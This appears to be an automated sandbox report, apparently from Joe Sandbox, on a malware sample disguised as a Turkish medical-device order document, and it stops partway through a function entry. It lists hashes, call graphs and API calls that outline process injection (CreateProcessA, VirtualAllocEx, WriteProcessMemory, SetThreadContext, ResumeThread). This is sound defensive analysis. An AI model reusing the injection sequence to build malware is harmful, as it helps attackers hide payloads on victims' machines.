                                                                                                                          execution_graph 43238 79a60ab 43239 79a6086 43238->43239 43240 79a61e0 43239->43240 43243 79a7628 43239->43243 43249 79a75e9 43239->43249 43243->43243 43244 79a7636 43243->43244 43256 79a76d6 43244->43256 43275 79a7668 43244->43275 43293 79a7678 43244->43293 43245 79a765f 43245->43239 43250 79a75f2 43249->43250 43251 79a7651 43249->43251 43250->43239 43252 79a765f 43251->43252 43253 79a7678 12 API calls 43251->43253 43254 79a7668 12 API calls 43251->43254 43255 79a76d6 12 API calls 43251->43255 43252->43239 43253->43252 43254->43252 43255->43252 43257 79a7664 43256->43257 43259 79a76d9 43256->43259 43258 79a76b6 43257->43258 43311 79a7d9d 43257->43311 43316 79a80bf 43257->43316 43321 79a83de 43257->43321 43326 79a7ad8 43257->43326 43335 79a81bb 43257->43335 43339 79a7a65 43257->43339 43347 79a80e7 43257->43347 43352 79a7dc6 43257->43352 43356 79a7c43 43257->43356 43360 79a7b6f 43257->43360 43367 79a7cd5 43257->43367 43372 79a7a74 43257->43372 43380 79a7c31 43257->43380 43388 79a7d10 43257->43388 43393 79a7db3 43257->43393 43258->43245 43259->43245 43276 79a7678 43275->43276 43277 79a81bb 2 API calls 43276->43277 43278 79a7ad8 4 API calls 43276->43278 43279 79a83de 2 API calls 43276->43279 43280 79a80bf 2 API calls 43276->43280 43281 79a7d9d 2 API calls 43276->43281 43282 79a7db3 2 API calls 43276->43282 43283 79a7d10 2 API calls 43276->43283 43284 79a7c31 4 API calls 43276->43284 43285 79a7a74 4 API calls 43276->43285 43286 79a7cd5 2 API calls 43276->43286 43287 79a76b6 43276->43287 43288 79a7b6f 4 API calls 43276->43288 43289 79a7c43 2 API calls 43276->43289 43290 79a7dc6 2 API calls 43276->43290 43291 79a80e7 2 API calls 43276->43291 43292 79a7a65 4 API calls 43276->43292 43277->43287 43278->43287 43279->43287 43280->43287 43281->43287 43282->43287 43283->43287 43284->43287 43285->43287 43286->43287 43287->43245 43288->43287 43289->43287 43290->43287 43291->43287 43292->43287 43294 79a7692 43293->43294 43295 79a81bb 2 API calls 43294->43295 43296 79a7ad8 4 API calls 43294->43296 43297 79a83de 2 API calls 43294->43297 43298 79a80bf 2 API calls 43294->43298 43299 79a7d9d 2 API calls 43294->43299 43300 79a7db3 2 API calls 43294->43300 43301 79a7d10 2 API calls 43294->43301 43302 79a7c31 4 API calls 43294->43302 43303 79a7a74 4 API calls 43294->43303 43304 79a7cd5 2 API calls 43294->43304 43305 79a76b6 43294->43305 43306 79a7b6f 4 API calls 43294->43306 43307 79a7c43 2 API calls 43294->43307 43308 79a7dc6 2 API calls 43294->43308 43309 79a80e7 2 API calls 43294->43309 43310 79a7a65 4 API calls 43294->43310 43295->43305 43296->43305 43297->43305 43298->43305 43299->43305 43300->43305 43301->43305 43302->43305 43303->43305 43304->43305 43305->43245 43306->43305 43307->43305 43308->43305 43309->43305 43310->43305 43312 79a7cd9 43311->43312 43398 79a59e8 43312->43398 43402 79a59e0 43312->43402 43313 79a8458 43317 79a83e6 43316->43317 43406 79a5848 43317->43406 43410 79a5850 43317->43410 43318 79a8401 43322 79a83e6 43321->43322 43324 79a5848 Wow64SetThreadContext 43322->43324 43325 79a5850 Wow64SetThreadContext 43322->43325 43323 79a8401 43324->43323 43325->43323 43327 79a7adb 43326->43327 43328 79a7a6b 43326->43328 43330 79a7ba3 43328->43330 43414 79a5c70 43328->43414 43418 79a5c64 43328->43418 43329 79a7c09 43329->43258 43330->43329 43422 79a5799 43330->43422 43426 79a57a0 43330->43426 43430 79a5928 43335->43430 43434 79a5921 43335->43434 43336 79a81d9 43340 79a7a66 43339->43340 43342 79a7ba3 43340->43342 43345 79a5c70 CreateProcessA 43340->43345 43346 79a5c64 CreateProcessA 43340->43346 43341 79a7c09 43341->43258 43342->43341 43343 79a5799 ResumeThread 43342->43343 43344 79a57a0 ResumeThread 43342->43344 43343->43342 43344->43342 43345->43342 43346->43342 43348 79a7bcb 43347->43348 43349 79a7c09 43348->43349 43350 79a5799 ResumeThread 43348->43350 43351 79a57a0 ResumeThread 43348->43351 43349->43258 43350->43348 43351->43348 43438 79a5ad8 43352->43438 43442 79a5ad0 43352->43442 43353 79a7deb 43353->43258 43358 79a59e8 WriteProcessMemory 43356->43358 43359 79a59e0 WriteProcessMemory 43356->43359 43357 79a7c6a 43358->43357 43359->43357 43365 79a5c70 CreateProcessA 43360->43365 43366 79a5c64 CreateProcessA 43360->43366 43361 79a7c09 43361->43258 43362 79a7ba3 43362->43361 43363 79a5799 ResumeThread 43362->43363 43364 79a57a0 ResumeThread 43362->43364 43363->43362 43364->43362 43365->43362 43366->43362 43368 79a7cd9 43367->43368 43370 79a59e8 WriteProcessMemory 43368->43370 43371 79a59e0 WriteProcessMemory 43368->43371 43369 79a8458 43370->43369 43371->43369 43373 79a7a66 43372->43373 43374 79a7ba3 43373->43374 43376 79a5c70 CreateProcessA 43373->43376 43377 79a5c64 CreateProcessA 43373->43377 43375 79a7c09 43374->43375 43378 79a5799 ResumeThread 43374->43378 43379 79a57a0 ResumeThread 43374->43379 43375->43258 43376->43374 43377->43374 43378->43374 43379->43374 43381 79a84c3 43380->43381 43382 79a7bcb 43380->43382 43384 79a5848 Wow64SetThreadContext 43381->43384 43385 79a5850 Wow64SetThreadContext 43381->43385 43383 79a7c09 43382->43383 43386 79a5799 ResumeThread 43382->43386 43387 79a57a0 ResumeThread 43382->43387 43383->43258 43384->43382 43385->43382 43386->43382 43387->43382 43389 79a7d33 43388->43389 43390 79a82e4 43389->43390 43391 79a59e8 WriteProcessMemory 43389->43391 43392 79a59e0 WriteProcessMemory 43389->43392 43390->43258 43391->43389 43392->43389 43394 79a7bcb 43393->43394 43395 79a7c09 43394->43395 43396 79a5799 ResumeThread 43394->43396 43397 79a57a0 ResumeThread 43394->43397 43395->43258 43396->43394 43397->43394 43399 79a5a30 WriteProcessMemory 43398->43399 43401 79a5a87 43399->43401 43401->43313 43403 79a59e8 WriteProcessMemory 43402->43403 43405 79a5a87 43403->43405 43405->43313 43407 79a5895 Wow64SetThreadContext 43406->43407 43409 79a58dd 43407->43409 43409->43318 43411 79a5895 Wow64SetThreadContext 43410->43411 43413 79a58dd 43411->43413 43413->43318 43415 79a5cf9 43414->43415 43415->43415 43416 79a5e5e CreateProcessA 43415->43416 43417 79a5ebb 43416->43417 43417->43417 43419 79a5c70 43418->43419 43419->43419 43420 79a5e5e CreateProcessA 43419->43420 43421 79a5ebb 43420->43421 43421->43421 43423 79a57a0 ResumeThread 43422->43423 43425 79a5811 43423->43425 43425->43330 43427 79a57a7 ResumeThread 43426->43427 43429 79a5811 43427->43429 43429->43330 43431 79a5968 VirtualAllocEx 43430->43431 43433 79a59a5 43431->43433 43433->43336 43435 79a5928 VirtualAllocEx 43434->43435 43437 79a59a5 43435->43437 43437->43336 43439 79a5b23 ReadProcessMemory 43438->43439 43441 79a5b67 43439->43441 43441->43353 43443 79a5b35 ReadProcessMemory 43442->43443 43444 79a5ad6 ReadProcessMemory 43442->43444 43445 79a5b67 43443->43445 43444->43445 43445->43353 43195 79a8858 43196 79a89e3 43195->43196 43197 79a887e 43195->43197 43197->43196 43199 79a40c8 43197->43199 43200 79a8ad8 PostMessageW 43199->43200 43201 79a8b44 43200->43201 43201->43197 43447 79a636e 43448 79a6086 43447->43448 43449 79a61e0 43448->43449 43450 79a7628 12 API calls 43448->43450 43451 79a75e9 12 API calls 43448->43451 43450->43448 43451->43448 43223 125d580 43224 125d5c6 43223->43224 43228 125d760 43224->43228 43231 125d75b 43224->43231 43225 125d6b3 43235 125d090 43228->43235 43232 125d760 43231->43232 43233 125d090 DuplicateHandle 43232->43233 43234 125d78e 43233->43234 43234->43225 43236 125d7c8 DuplicateHandle 43235->43236 43237 125d78e 43236->43237 43237->43225 43202 1254668 43203 125467a 43202->43203 43204 1254686 43203->43204 43206 1254778 43203->43206 43207 125479d 43206->43207 43211 1254878 43207->43211 43215 1254888 43207->43215 43213 12548af 43211->43213 43212 125498c 43212->43212 43213->43212 43219 12544b4 43213->43219 43217 12548af 43215->43217 43216 125498c 43216->43216 43217->43216 43218 12544b4 CreateActCtxA 43217->43218 43218->43216 43220 1255918 CreateActCtxA 43219->43220 43222 12559db 43220->43222 43452 125b218 43453 125b227 43452->43453 43455 125b300 43452->43455 43456 125b2b5 43455->43456 43460 125b30a 43455->43460 43456->43453 43457 125b344 43457->43453 43458 125b548 GetModuleHandleW 43459 125b575 43458->43459 43459->43453 43460->43457 43460->43458

                                                                                                                          Executed Functions

                                                                                                                          Function 06224128 Relevance: 15.1, Strings: 10, Instructions: 2597COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq$4'q$4'q$4'q$4'q$4'q$4'q$4|q$4|q$$q
                                                                                                                          • API String ID: 0-1265471490
                                                                                                                          • Opcode ID: beb742477800e166469bb42bc89fe8c9238142dd43c178b4ea80f1f027ce7e4f
                                                                                                                          • Instruction ID: 69aa6104e9b19f0e9e83a9537e5b89f69cf123b274c38f5ed1214f1374655575
                                                                                                                          • Opcode Fuzzy Hash: beb742477800e166469bb42bc89fe8c9238142dd43c178b4ea80f1f027ce7e4f
                                                                                                                          • Instruction Fuzzy Hash: 7E43FC75E1122ADFDB64DF68C888A9DB7B2BF88310F158595D809AB361CB31ED81CF50
                                                                                                                          Function 06223668 Relevance: 7.0, Strings: 5, Instructions: 723COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq$(oq$,q$,q$Hq
                                                                                                                          • API String ID: 0-962059274
                                                                                                                          • Opcode ID: f39be190a4e86e85209440bc52873b33388b99c1dda8dd7f9d0fb4aefb84923f
                                                                                                                          • Instruction ID: 1a9d9eda2d2e7239e2fefdb502bbe569503ed46c8fd1ab6007c128c8ed216dfb
                                                                                                                          • Opcode Fuzzy Hash: f39be190a4e86e85209440bc52873b33388b99c1dda8dd7f9d0fb4aefb84923f
                                                                                                                          • Instruction Fuzzy Hash: D9526235B10226EFDB58DF69D884AAE77B2BF88710B158169EC16DB360DB34DC41CB90
                                                                                                                          Function 06221240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 0-2564639436
                                                                                                                          • Opcode ID: 6bf1fc0dd0aeaf1494a9ef8f1b41feffbce18964b930d4261e3db683136fb861
                                                                                                                          • Instruction ID: ad27be5a68e69830cfc3d8690441612acf531996f9875986c89f85d26489e23f
                                                                                                                          • Opcode Fuzzy Hash: 6bf1fc0dd0aeaf1494a9ef8f1b41feffbce18964b930d4261e3db683136fb861
                                                                                                                          • Instruction Fuzzy Hash: EC62D074E11229CFDB64DF68C988BDDBBB2BB49300F1081E9D949AB254DB309E95CF50
                                                                                                                          Function 079A9460 Relevance: .6, Instructions: 598COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c7b2a735f494c7992ea406504ae354a9be2fa94da19b647ae48faa335f6fee3d
                                                                                                                          • Instruction ID: 80cbd390947b6eb03e1dd76ff26c54c471eada93695fb899a3002c2a3f5b6a72
                                                                                                                          • Opcode Fuzzy Hash: c7b2a735f494c7992ea406504ae354a9be2fa94da19b647ae48faa335f6fee3d
                                                                                                                          • Instruction Fuzzy Hash: 6922BEB0B02215AFDB59DB69C490BAEB7FABF89214F144469E546DB390CB34EC01CB91
                                                                                                                          Function 01253E34 Relevance: .2, Instructions: 196COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 75a55651e5b273044d16c4ffd1a2a1560db224dc9cf6f0238a7bd39ff1a9ac54
                                                                                                                          • Instruction ID: ff0f95ecbbbc37678907f208e128ecd97a32ddc7dd89b8d1dd49a8f2519c39fd
                                                                                                                          • Opcode Fuzzy Hash: 75a55651e5b273044d16c4ffd1a2a1560db224dc9cf6f0238a7bd39ff1a9ac54
                                                                                                                          • Instruction Fuzzy Hash: B081B474E102099FDF58DFA5D894AEEBBB2BF88300F248129D815AB368DA355842CF54
                                                                                                                          Function 01256F90 Relevance: .1, Instructions: 138COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 81e1960425dd4eec1e6c1b0c78d0119940d920c7135cee2a54c2b2c670809ac6
                                                                                                                          • Instruction ID: ef055684e143b985f320396df80ee671c4f9e4ba2ee4812523bd2dd1e3b71606
                                                                                                                          • Opcode Fuzzy Hash: 81e1960425dd4eec1e6c1b0c78d0119940d920c7135cee2a54c2b2c670809ac6
                                                                                                                          • Instruction Fuzzy Hash: BC51D674E102499FDF58DFA9D894AEEBBB2BF88300F148169D415BB368DB345942CF90
                                                                                                                          Function 079A7C8B Relevance: .0, Instructions: 17COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 27fe525d69d748e785ead0eb8814896caae5df50915c8d14fd18c46731d5397e
                                                                                                                          • Instruction ID: 5cef0e2a24603e15086144b2d1c2996fab5bd7cebd472a7a34a4222f20ec617d
                                                                                                                          • Opcode Fuzzy Hash: 27fe525d69d748e785ead0eb8814896caae5df50915c8d14fd18c46731d5397e
                                                                                                                          • Instruction Fuzzy Hash: C0D017B480E208EACB10DF64E4489B8B7B8AB5F314F406495982AE7212C7308940CF81
                                                                                                                          Function 079A5C64 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 253processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1297 79a5c64-79a5d05 1300 79a5d3e-79a5d5e 1297->1300 1301 79a5d07-79a5d11 1297->1301 1308 79a5d60-79a5d6a 1300->1308 1309 79a5d97-79a5dc6 1300->1309 1301->1300 1302 79a5d13-79a5d15 1301->1302 1303 79a5d38-79a5d3b 1302->1303 1304 79a5d17-79a5d21 1302->1304 1303->1300 1306 79a5d23 1304->1306 1307 79a5d25-79a5d34 1304->1307 1306->1307 1307->1307 1310 79a5d36 1307->1310 1308->1309 1311 79a5d6c-79a5d6e 1308->1311 1315 79a5dc8-79a5dd2 1309->1315 1316 79a5dff-79a5eb9 CreateProcessA 1309->1316 1310->1303 1313 79a5d70-79a5d7a 1311->1313 1314 79a5d91-79a5d94 1311->1314 1317 79a5d7e-79a5d8d 1313->1317 1318 79a5d7c 1313->1318 1314->1309 1315->1316 1319 79a5dd4-79a5dd6 1315->1319 1329 79a5ebb-79a5ec1 1316->1329 1330 79a5ec2-79a5f48 1316->1330 1317->1317 1320 79a5d8f 1317->1320 1318->1317 1321 79a5dd8-79a5de2 1319->1321 1322 79a5df9-79a5dfc 1319->1322 1320->1314 1324 79a5de6-79a5df5 1321->1324 1325 79a5de4 1321->1325 1322->1316 1324->1324 1326 79a5df7 1324->1326 1325->1324 1326->1322 1329->1330 1340 79a5f4a-79a5f4e 1330->1340 1341 79a5f58-79a5f5c 1330->1341 1340->1341 1342 79a5f50 1340->1342 1343 79a5f5e-79a5f62 1341->1343 1344 79a5f6c-79a5f70 1341->1344 1342->1341 1343->1344 1347 79a5f64 1343->1347 1345 79a5f72-79a5f76 1344->1345 1346 79a5f80-79a5f84 1344->1346 1345->1346 1348 79a5f78 1345->1348 1349 79a5f96-79a5f9d 1346->1349 1350 79a5f86-79a5f8c 1346->1350 1347->1344 1348->1346 1351 79a5f9f-79a5fae 1349->1351 1352 79a5fb4 1349->1352 1350->1349 1351->1352 1354 79a5fb5 1352->1354 1354->1354
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 079A5EA6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID: mfCo$mfCo
                                                                                                                          • API String ID: 963392458-1726904461
                                                                                                                          • Opcode ID: 19b9dc6c3e0c0e9675a7ea9ecd6c1cf16db94ba7207e482c403c170238a06f0b
                                                                                                                          • Instruction ID: 3e758c8f2600e05f7e46513020fcefc4c862ac32f18f4ceb4a7a9ce2541ca573
                                                                                                                          • Opcode Fuzzy Hash: 19b9dc6c3e0c0e9675a7ea9ecd6c1cf16db94ba7207e482c403c170238a06f0b
                                                                                                                          • Instruction Fuzzy Hash: D4A19CB1E0131ADFEB24CF68C845BEDBBB6BF48314F158169E818A7240DB349995CF91
                                                                                                                          Function 079A5C70 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1355 79a5c70-79a5d05 1357 79a5d3e-79a5d5e 1355->1357 1358 79a5d07-79a5d11 1355->1358 1365 79a5d60-79a5d6a 1357->1365 1366 79a5d97-79a5dc6 1357->1366 1358->1357 1359 79a5d13-79a5d15 1358->1359 1360 79a5d38-79a5d3b 1359->1360 1361 79a5d17-79a5d21 1359->1361 1360->1357 1363 79a5d23 1361->1363 1364 79a5d25-79a5d34 1361->1364 1363->1364 1364->1364 1367 79a5d36 1364->1367 1365->1366 1368 79a5d6c-79a5d6e 1365->1368 1372 79a5dc8-79a5dd2 1366->1372 1373 79a5dff-79a5eb9 CreateProcessA 1366->1373 1367->1360 1370 79a5d70-79a5d7a 1368->1370 1371 79a5d91-79a5d94 1368->1371 1374 79a5d7e-79a5d8d 1370->1374 1375 79a5d7c 1370->1375 1371->1366 1372->1373 1376 79a5dd4-79a5dd6 1372->1376 1386 79a5ebb-79a5ec1 1373->1386 1387 79a5ec2-79a5f48 1373->1387 1374->1374 1377 79a5d8f 1374->1377 1375->1374 1378 79a5dd8-79a5de2 1376->1378 1379 79a5df9-79a5dfc 1376->1379 1377->1371 1381 79a5de6-79a5df5 1378->1381 1382 79a5de4 1378->1382 1379->1373 1381->1381 1383 79a5df7 1381->1383 1382->1381 1383->1379 1386->1387 1397 79a5f4a-79a5f4e 1387->1397 1398 79a5f58-79a5f5c 1387->1398 1397->1398 1399 79a5f50 1397->1399 1400 79a5f5e-79a5f62 1398->1400 1401 79a5f6c-79a5f70 1398->1401 1399->1398 1400->1401 1404 79a5f64 1400->1404 1402 79a5f72-79a5f76 1401->1402 1403 79a5f80-79a5f84 1401->1403 1402->1403 1405 79a5f78 1402->1405 1406 79a5f96-79a5f9d 1403->1406 1407 79a5f86-79a5f8c 1403->1407 1404->1401 1405->1403 1408 79a5f9f-79a5fae 1406->1408 1409 79a5fb4 1406->1409 1407->1406 1408->1409 1411 79a5fb5 1409->1411 1411->1411
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 079A5EA6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID: mfCo$mfCo
                                                                                                                          • API String ID: 963392458-1726904461
                                                                                                                          • Opcode ID: d8d48bad234dc9a48e0638c474143232d77ff46aca3ee8ce4903b285f23542b9
                                                                                                                          • Instruction ID: 8223f54bbff20d914040393d2a4a54d65f5aece69ae236684c75a11b59c2d241
                                                                                                                          • Opcode Fuzzy Hash: d8d48bad234dc9a48e0638c474143232d77ff46aca3ee8ce4903b285f23542b9
                                                                                                                          • Instruction Fuzzy Hash: FD919AB1E0131ADFEB24CF68C845BEDBBB6BF48304F118169E818A7240DB348995CF91
                                                                                                                          Function 07652AD8 Relevance: 4.0, Strings: 3, Instructions: 222COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1412 7652ad8-7652ae7 1413 7652aef-7652af1 1412->1413 1414 7652af3-7652b08 1413->1414 1415 7652b0b-7652b78 call 76520d8 1413->1415 1424 7652c24-7652c3b 1415->1424 1425 7652b7e-7652b80 1415->1425 1438 7652c41 1424->1438 1439 7652c3d-7652c3f 1424->1439 1426 7652b86-7652b91 call 76522f0 1425->1426 1427 7652cb0-7652d57 1425->1427 1433 7652b93-7652b95 1426->1433 1434 7652bae-7652bb2 1426->1434 1467 7652d60-7652d81 1427->1467 1468 7652d59-7652d5f 1427->1468 1440 7652b97-7652b9e 1433->1440 1441 7652ba0-7652bab call 76516cc 1433->1441 1435 7652bb4-7652bc8 call 7652418 1434->1435 1436 7652c11-7652c1a 1434->1436 1450 7652bde-7652be2 1435->1450 1451 7652bca-7652bdb call 76516cc 1435->1451 1444 7652c46-7652c48 1438->1444 1439->1444 1440->1434 1441->1434 1448 7652c7d-7652ca9 1444->1448 1449 7652c4a-7652c76 1444->1449 1448->1427 1449->1448 1455 7652be4 1450->1455 1456 7652bea-7652c03 1450->1456 1451->1450 1455->1456 1463 7652c05 1456->1463 1464 7652c0e 1456->1464 1463->1464 1464->1436 1468->1467
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (q$Hq$mfCo
                                                                                                                          • API String ID: 0-1917725502
                                                                                                                          • Opcode ID: 0803ab433e2469823a36d43a8fe91e4af3f3c99810a91afc88ca81df2e9ee3d7
                                                                                                                          • Instruction ID: 2579ca12ee42ee1ca8cd2eb1cfba27d407f4c3740efc35dd5e04dde59dde0f49
                                                                                                                          • Opcode Fuzzy Hash: 0803ab433e2469823a36d43a8fe91e4af3f3c99810a91afc88ca81df2e9ee3d7
                                                                                                                          • Instruction Fuzzy Hash: B471AEB1A102198FEB14DF75D9187AEBBF6FFC8210F14842ED846A7381DB349941CBA5
                                                                                                                          Function 0622A348 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1473 622a348-622a35f 1475 622a3c2-622a3d0 1473->1475 1476 622a361-622a370 1473->1476 1479 622a3d2-622a3dd call 6228a34 1475->1479 1480 622a3e3-622a3e5 1475->1480 1476->1475 1481 622a372-622a37e call 6228a74 1476->1481 1479->1480 1487 622a4a1-622a515 1479->1487 1486 622a3ec-622a3fb 1480->1486 1488 622a392-622a3ae 1481->1488 1489 622a380-622a38c call 6228a84 1481->1489 1494 622a413-622a416 1486->1494 1495 622a3fd-622a40c 1486->1495 1518 622a517-622a51d 1487->1518 1519 622a52d-622a52e 1487->1519 1502 622a3b4-622a3b8 1488->1502 1503 622a45c-622a49a 1488->1503 1489->1488 1497 622a417-622a455 1489->1497 1495->1494 1497->1503 1502->1475 1503->1487 1520 622a521-622a523 1518->1520 1521 622a51f 1518->1521 1520->1519 1521->1519
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hq$Hq$Hq
                                                                                                                          • API String ID: 0-2505839570
                                                                                                                          • Opcode ID: 68e282cb4aceeb88a5d5fa8b6b0e586c285bcdb0dd534c7eb1518c79c912f3a9
                                                                                                                          • Instruction ID: 9973ea018f184d0c5e03174da8edf9b1d22173e17303a9adcab502214cfc0fe8
                                                                                                                          • Opcode Fuzzy Hash: 68e282cb4aceeb88a5d5fa8b6b0e586c285bcdb0dd534c7eb1518c79c912f3a9
                                                                                                                          • Instruction Fuzzy Hash: 6641E230B247125BE7A5AF74A51462E73E7AFC4240B58487DD942CB7C1EF28DC02C366
                                                                                                                          Function 07659260 Relevance: 3.8, Strings: 3, Instructions: 50COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1590 7659260-7659342 1593 765934d-76593ae 1590->1593 1608 765932a-7659331 1593->1608
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8q$8q$8q
                                                                                                                          • API String ID: 0-3169173723
                                                                                                                          • Opcode ID: 5bbc2f2c3b5e72e1247b47e0a8a817e8acf211c094b264bf586c76547b3d4380
                                                                                                                          • Instruction ID: 77d5af640eca09f3de821e5db6a95f57e54f9c651f739046c30c31a9b56adc7d
                                                                                                                          • Opcode Fuzzy Hash: 5bbc2f2c3b5e72e1247b47e0a8a817e8acf211c094b264bf586c76547b3d4380
                                                                                                                          • Instruction Fuzzy Hash: 5201D4F4A3C306DBC7045764C448A7E7AA6EB8B340F51442A9E07EB3C0DA716803AB97
                                                                                                                          Function 0765839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
